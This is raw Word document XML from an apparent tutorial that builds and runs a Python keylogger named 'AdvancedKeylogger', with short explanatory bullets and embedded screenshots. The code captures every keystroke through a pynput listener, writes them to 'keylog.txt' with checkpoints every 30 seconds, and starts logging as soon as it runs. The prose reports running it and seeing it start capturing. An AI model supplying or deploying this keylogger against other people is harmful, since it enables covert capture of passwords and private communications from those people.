          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63E7C661">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07E5F470">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52AA96E8">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D25E1FA">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def on_press(self, key):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26037823">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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656621F0">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current_key = str(key.char)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D34B143">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except AttributeError:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62256237">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if key == key.space:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D6B2AD">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current_key = " "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331FD1CA">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elif key == key.enter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633B98BF">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current_key = "\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CE1A16">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elif key == key.backspace:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631AC4CA">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current_key = " [BACKSPACE] "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379DC47D">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elif key == key.tab:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4ABA65">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current_key = " [TAB] "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A41B3A">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elif key == key.esc:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB6DF88">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self.stop()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EC4952">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return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF16F85">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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8A3F33">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current_key = f" [{str(key)}] "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2367C933">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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180B84CD">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self.append_to_log(current_key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA3B8F5">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31BC43B0">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Regular Keys</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: Tries to convert key to character like numbers and symbols</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CF3938">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E23D130">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53408BB1">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def start(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61773779">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print("Advanced Keylogger Started!")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E13DBE">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print(" Press ESC to stop")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C99AE1B">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print(f"Logging to: {self.log_file}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4ADA3F">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print(f"Checkpoints every: {self.interval} seconds")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3554EE53">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self.report()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C78B77">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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E54E07">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with pynput.keyboard.Listener(on_press=self.on_press, on_release=self.on_release) as listener:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A389D9A">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listener.join()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F648CC6">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07D998EC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>self.report</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: Start the reporting </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F31BDFE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">with pynput.keyboard.Listener </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: Start the strokes of keyboard when we press key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8F7429">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BC48B99">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if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292970D9">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keylogger = AdvancedKeylogger(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD0DA03">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time_interval=30,      # Checkpoints every 30 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABBDEED">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log_file="keylog.txt"  # Single log file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E568D94">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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA816F4">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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BBCBFC">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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A78045A">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keylogger.start()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F7E55F">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except KeyboardInterrupt:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185D4FDF">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        keylogger.stop()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53673AD8">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00FB4DC6">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F52EA09">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Instantiates the keylogger with custom settings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A1D8B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Catches Ctrl+C interruption for graceful shutdown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45389735">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Immediately begins keylogging when script runs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F47F95F">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61CFD264">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="211FBEDF">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48A463E2">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C16FBBA">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BF8DF76">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="2A6771C8">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Now we will check if this code is working properly or not by executing the keylogger.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BEE1F1">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="435D5D4C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">We will use the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>python keylogger.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> using this command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9E3ED6">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3192780" cy="569595"/>
            <wp:effectExtent l="0" t="0" r="7620" b="9525"/>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
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId4"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3192780" cy="569595"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDD93A0">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01B878F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Now as we can see the keylogger has been executed and it has started capturing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378A8399">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3188335" cy="1008380"/>
            <wp:effectExtent l="0" t="0" r="12065" b="12700"/>
            <wp:docPr id="2" name="Picture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
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3188335" cy="1008380"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE9DD2A">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
